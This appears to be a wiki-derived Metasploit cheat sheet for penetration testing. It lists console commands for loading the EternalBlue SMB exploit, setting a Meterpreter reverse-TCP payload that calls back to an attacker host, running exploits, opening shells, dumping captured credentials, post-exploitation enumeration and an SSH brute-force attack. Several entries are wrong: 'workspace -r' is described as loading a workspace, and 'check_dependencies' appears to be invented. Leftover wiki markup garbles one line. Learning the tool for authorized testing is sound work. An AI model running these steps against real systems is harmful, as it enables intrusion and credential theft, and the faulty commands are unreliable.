METASPLOIT - Base Commands
Starting Metasploit Console
To start the Metasploit Framework console, use the following command:
msfconsole
This launches the Metasploit interactive console, where you can execute various commands for penetration testing.
Search for Exploits
To search for a specific exploit module or vulnerability in Metasploit:
search <search_term>
For example, to search for exploits related to "Windows SMB":
search smb windows
This will list all relevant exploits, auxiliary modules, and payloads.
Show Available Modules
To list all available Metasploit modules, use:
show modules
This command lists all types of modules, including exploits, auxiliary, post-exploitation, and payloads.
Use an Exploit Module
To use an exploit module:
use <module_path>
For example, to use an SMB exploit:
use exploit/windows/smb/ms17_010_eternalblue
This sets the module for use in the current session.
Show Module Options
To view the options available for a specific module:
show options
This displays required and optional parameters for the current module.
Set Module Options
To set the required parameters for an exploit, such as the target IP address:
set RHOST <target_ip>
Replace `<target_ip>` with the actual target machine's IP address. You can set other options in a similar way.
Show Payloads
To list all available payloads for a specific exploit:
show payloads
This will show the payloads compatible with the currently selected exploit.
Select and Set Payload
To select and configure a payload:
set PAYLOAD <payload_name>
For example, to set a reverse TCP payload:
set PAYLOAD windows/meterpreter/reverse_tcp
You can then set specific options for the payload, like the LHOST (local host IP):
set LHOST <local_ip>
- Example:
set LHOST 192.168.1.100
Running the Exploit
Once the module and payload are set, you can run the exploit:
exploit
This will execute the exploit and attempt to gain access to the target machine.
Running the Exploit in Background
If you want to run the exploit in the background without blocking the terminal:
exploit -j
The `-j` flag runs the exploit as a background job.
Show Sessions
To view active sessions after exploiting a target:
sessions
This command shows a list of all active sessions (Meterpreter or shell sessions).
Interact with a Session
To interact with a specific session:
sessions -i <session_id>/nowiki> For example, to interact with session 1: <nowiki> sessions -i 1
This gives you a shell or Meterpreter prompt for that session.
Background a Session
To background a session and return to the main Metasploit console:
background
This command puts the current session in the background, allowing you to continue working on other tasks in the console.
Session Cleanup
To terminate a specific session:
sessions -k <session_id>
For example:
sessions -k 1
This closes session 1.
Exploit Vulnerability Verification
To verify if a specific vulnerability exists on the target machine, use the following command:
check
This will run basic checks to determine if the target is vulnerable to the selected exploit.
List Credentials
If you have gained access to the target system and want to list available credentials:
creds
This command shows all credentials (e.g., username and password pairs) captured during the session.
Save Your Progress
To save the current state of your Metasploit session (including all modules, options, and sessions):
save
This will save your current Metasploit environment to the default location.
Load a Saved Workspace
To load a saved Metasploit workspace:
workspace -r <workspace_file>
This will restore your saved workspace, including all settings, modules, and sessions.
Managing Workspaces
To list all available workspaces:
workspace
To create a new workspace:
workspace -a <workspace_name>
To switch between workspaces:
workspace <workspace_name>
- Example:
workspace my_new_workspace
Running Auxiliary Modules
To use an auxiliary module (e.g., a scanner):
use auxiliary/scanner/portscan/tcp
You can then set the target and run the module just like with an exploit.
Start a Post-Exploitation Module
Once you have access to a system, you can use post-exploitation modules. For example, to use a module that collects information about the target:
use post/windows/gather/enum_logged_on_users
This collects information about logged-on users on the Windows target.
Show Help for Commands
To get help for a specific command or module, use:
help <command>
For example, to get help on the `sessions` command:
help sessions
This will display detailed usage instructions and options for the command.
Advanced Search for Exploits
You can use advanced search queries to filter modules by specific parameters:
search type:exploit platform:windows name:ms17_010
This command searches for exploits related to the MS17-010 vulnerability on Windows platforms.
Check for Dependencies
To check if a module has any missing dependencies before use:
check_dependencies
This command will list any missing libraries or files needed to run a module.
Perform a Dictionary Attack
To use a dictionary attack against an SSH service, for example:
use auxiliary/scanner/ssh/ssh_login set RHOSTS <target_ip> set USER_FILE /path/to/usernames.txt set PASS_FILE /path/to/passwords.txt run
This runs an SSH login brute-force attack using the specified username and password lists.
Display Environment Variables
To display the current environment variables in Metasploit:
env
This will show details about the current environment, including system and framework-specific variables.
Exit Metasploit Console
To exit the Metasploit console:
exit
This command will close the Metasploit Framework console and return to the command-line prompt.
